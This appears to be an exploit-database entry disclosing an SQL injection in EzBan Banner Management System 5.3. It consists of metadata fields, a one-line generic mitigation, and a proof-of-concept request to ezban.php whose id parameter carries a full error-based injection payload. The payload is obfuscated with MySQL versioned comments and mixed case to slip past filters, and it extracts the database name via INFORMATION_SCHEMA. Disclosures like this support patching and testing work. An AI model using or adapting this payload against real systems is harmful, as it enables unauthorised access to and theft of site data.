vendor:
EzBan
by:
Ihsan Sencan
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: EzBan
Affected Version From: 5.3
Affected Version To: 5.3
Patch Exists: N/A
Related CWE: N/A
CPE: a:mysticdreams:ezban:5.3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
EzBan – Banner Management System 5.3 – SQL Injection
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: Sql http://localhost/[PATH]/ezban.php?id=[SQL]&action=show 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show
Mitigation:
Input validation and sanitization, use of prepared statements, and other techniques to prevent SQL injection attacks.